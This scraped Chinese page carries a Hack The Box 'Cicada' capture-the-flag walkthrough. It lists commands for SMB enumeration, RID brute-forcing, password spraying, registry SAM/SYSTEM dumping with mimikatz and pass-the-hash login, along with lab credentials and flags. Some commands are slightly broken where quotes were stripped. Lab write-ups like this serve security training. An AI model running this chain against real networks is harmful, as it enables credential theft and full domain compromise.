当前位置: 首页 > news >正文

网站建设开发方式包括哪些方面十大进口跨境电商平台

网站建设开发方式包括哪些方面,十大进口跨境电商平台,刘涛做代言的那个网站,婚礼摄影作品网站目录 连接至HTB服务器并启动靶机 使用nmap对靶机进行开放端口扫描 使用nmap对靶机开放端口进行脚本、服务信息扫描 首先尝试空密码连接靶机SMB服务 由于不知道账户名#xff0c;这里我们使用crackmapexec对smb服务进行用户爆破 通过该账户连接至靶机SMB服务器提取敏感信…目录 连接至HTB服务器并启动靶机 使用nmap对靶机进行开放端口扫描 使用nmap对靶机开放端口进行脚本、服务信息扫描 首先尝试空密码连接靶机SMB服务 由于不知道账户名这里我们使用crackmapexec对smb服务进行用户爆破 通过该账户连接至靶机SMB服务器提取敏感信息 使用david.orelious用户凭证登录靶机SMB服务 使用evil-winrm通过上文凭证连接到靶机WinRM服务 USER_FLAG0c79a06b429a6c9144e52201714e6328 权限提升 尝试将注册表中的SAM、SYSTEM进行读取保存 ROOT_FLAGb7c206ec1a5f03f4de21e622502f4005 连接至HTB服务器并启动靶机 靶机IP10.10.11.35 分配IP10.10.16.22 使用nmap对靶机进行开放端口扫描 nmap -p- --min-rate1500 -sS -sU -Pn 10.10.11.35 将输出写入res.txt文件中并提取端口号存入变量ports ports$(cat res.txt | grep ^[0-9] | cut -d / -f 1 | tr \n , | sed s/,$//) 使用nmap对靶机开放端口进行脚本、服务信息扫描 nmap -p$ports -sCV 10.10.11.35 首先尝试空密码连接靶机SMB服务 smbclient -L 10.10.11.35 列出HR共享中的所有文件 smbclient -N \\\\10.10.11.35\\HR 将Notice from HR.txt文件下载到本地 get Notice from HR.txt 查看该文件内容 cat Notice from HR.txt 密码Cicada$M6Corpb*Lp#nZp!8 由于不知道账户名这里我们使用crackmapexec对smb服务进行用户爆破 crackmapexec smb 10.10.11.35 -u guest -p --rid-brute | grep SidTypeUser 将该输出保存到users.txt文件中再将所有用户名进行提取 cat users.txt | cut -f 2 -d \ | cut -f 1 -d | tee users.txt 使用上文拿到的密码对靶机账户进行密码喷洒 crackmapexec smb 10.10.11.35 -u users.txt -p Cicada$M6Corpb*Lp#nZp!8 由输出可见该密码对账户michael.wrightson生效 账户michael.wrightson 密码Cicada$M6Corpb*Lp#nZp!8 通过该账户连接至靶机SMB服务器提取敏感信息 crackmapexec smb 10.10.11.35 -u michael.wrightson -p Cicada$M6Corpb*Lp#nZp!8 --users 账户david.orelious 密码aRt$Lp#7t*VQ!3 使用david.orelious用户凭证登录靶机SMB服务 smbclient -U david.orelious //10.10.11.35/DEV 将Backup_script.ps1文件下载到本地 get Backup_script.ps1 查看该文件内容 cat Backup_script.ps1 账户emily.oscars 密码Q!3Lp#M6b*7t*Vt 使用evil-winrm通过上文凭证连接到靶机WinRM服务 evil-winrm -i 10.10.11.35 -u emily.oscars -p Q!3Lp#M6b*7t*Vt 进入C盘根目录 cd C:\ 查找user_flag位置 cmd.exe /c dir /s user.txt 可以看到有两个user.txt文件两个都查看内容发现是一样的 type C:\Documents and Settings\emily.oscars.CICADA\Desktop\user.txt type C:\Users\emily.oscars.CICADA\Desktop\user.txt *Evil-WinRM* PS C:\ type C:\Documents and Settings\emily.oscars.CICADA\Desktop\user.txt 0c79a06b429a6c9144e52201714e6328 *Evil-WinRM* PS C:\ type C:\Users\emily.oscars.CICADA\Desktop\user.txt 0c79a06b429a6c9144e52201714e6328 USER_FLAG0c79a06b429a6c9144e52201714e6328 权限提升 列出所有用户组 可以看到该用户具有文件备份特权(SeBackupPrivilege) 尝试将注册表中的SAM、SYSTEM进行读取保存 reg save hklm\sam sam reg save hklm\system system 利用这两个注册表文件抓取靶机管理员密码 .\mimikatz.exe lsadump::sam /sam:sam /system:system exit 账户Administrator 密码2b87e7c93a3e8a0ea4a581937016f341 利用该哈希值直接通过evil-winrm登录靶机 evil-winrm -i 10.10.11.35 -H 2b87e7c93a3e8a0ea4a581937016f341 -u Administrator 进入C盘根目录下 cd C:\ 查找root_flag位置 cmd.exe /c dir /s root.txt 查看root_flag内容 type C:\Users\Administrator\Desktop\root.txt *Evil-WinRM* PS C:\Users\Administrator\Documents cd C:\ *Evil-WinRM* PS C:\ cmd.exe /c dir /s root.txt  Volume in drive C has no label.  Volume Serial Number is 1B60-8905  Directory of C:\Documents and Settings\Administrator\Desktop 10/30/2024  04:30 PM                34 root.txt                1 File(s)             34 bytes  Directory of C:\Users\Administrator\Desktop 10/30/2024  04:30 PM                34 root.txt                1 File(s)             34 bytes      Total Files Listed:                2 File(s)             68 bytes                0 Dir(s)   1,663,627,264 bytes free *Evil-WinRM* PS C:\ type C:\Users\Administrator\Desktop\root.txt b7c206ec1a5f03f4de21e622502f4005 ROOT_FLAGb7c206ec1a5f03f4de21e622502f4005
http://www.w-s-a.com/news/709591/

相关文章:

  • 网页游戏网站搭建免费建网站哪个模板多
  • 公司起名打分最准的免费网站直播网站app开发
  • 医疗器械类网站前置审批网站临时域名
  • 金融网站策划方案网站开发表格整体页面居中
  • 句容本地网站黄石下陆区建设局网站
  • 免费网站服务陕西省咸阳市建设银行网站
  • 网站建设活动计划做网站意义
  • 莱芜新闻主持人名单seo sem 外贸建站 网站建设 文化墙设计
  • 易语言可以做网站嘛赣州网站建设开发
  • 网站建设规范布局网站建设费往什么科目
  • 乐清手机网站设计哪个汽车网站汽贸店免费做
  • 网站建设课程总结报告推广软文
  • 企业网站哪里可以做烟台seo网站推广
  • 怎样建设网站优化珠海网站建设开发
  • 泰兴住房和城乡建设厅网站福州app开发
  • 免费制作公司网站seo前线
  • 导购网站怎么推广有网站源码怎么搭建网站
  • 网站开发问题杭州制作公司网站
  • 网站推广seo是什么wordpress 去除顶部
  • 建筑学不会画画影响大吗电子商务沙盘seo关键词
  • 重庆网站建设找承越上海建设工程招投标网
  • 网站建设四个步骤下单的网站建设教程
  • 网站建设合同的验收表响应式网站建设哪家好
  • 手机网站建设视频长沙百家号seo
  • 网站未备案怎么访问网站开发前端需要学什么
  • 正黄集团博弘建设官方网站wordpress设置固定链接和伪静态
  • wordpress 建网站视频如何实现网站生成网页
  • 杭州品牌网站建设推广个人的网站建设目标
  • 济南有哪些网站是做家具团购的贸易公司自建免费网站
  • wap网站psd成立公司在什么网站